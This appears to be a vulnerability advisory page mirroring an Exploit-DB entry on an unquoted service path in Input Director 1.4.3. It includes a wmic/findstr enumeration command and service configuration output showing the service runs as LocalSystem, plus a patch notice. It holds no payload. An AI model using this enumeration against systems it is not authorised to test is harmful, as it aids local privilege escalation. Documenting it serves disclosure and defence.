Input Director 1.4.3 - 'Input Director' Unquoted Service Path

vendor:

Input Director

by:

TOUHAMI Kasbaoui

3.17.8

CVSS

HIGH

Unquoted Service Path

N/A

CWE

Product Name: Input Director

Affected Version From: 1.4.3

Affected Version To: 1.4.3

Patch Exists: YES

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Platforms Tested: Windows Server 2012, Windows 10

2020

Input Director 1.4.3 – ‘Input Director’ Unquoted Service Path

A successful attempt to exploit this vulnerability could allow executing code during startup or reboot with the elevated privileges.

Mitigation:

Input Director has released a patch to address this vulnerability. Users should update to the latest version of Input Director.

Source

Exploit-DB raw data:

# Exploit Title: Input Director 1.4.3 - 'Input Director' Unquoted Service Path
# Discovery Date: 2020-09-08
# Response from Input Director Support: 09/09/2020
# Exploit Author: TOUHAMI Kasbaoui
# Vendor Homepage: https://www.inputdirector.com/
# Version: 1.4.3
# Tested on: Windows Server 2012, Windows 10

# Find the Unquoted Service Path Vulnerability:

C:\wmic service get name,displayname,pathname,startmode | findstr /i "auto"
| findstr /i /v "c:\windows\\" | findstr /i /v """

Input Director Service  InputDirector  C:\Program Files
(x86)\InputDirector\IDWinService.exe Auto

# Service info:

C:\sc qc IDWinService
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: InputDirector
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : C:\Program Files (x86)\Input
Director\IDWinService.exe
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : Input Director Service
        DEPENDENCIES       :
        SERVICE_START_NAME : LocalSystem

# Exploit:

A successful attempt to exploit this vulnerability could allow executing
code during startup or reboot with the elevated privileges.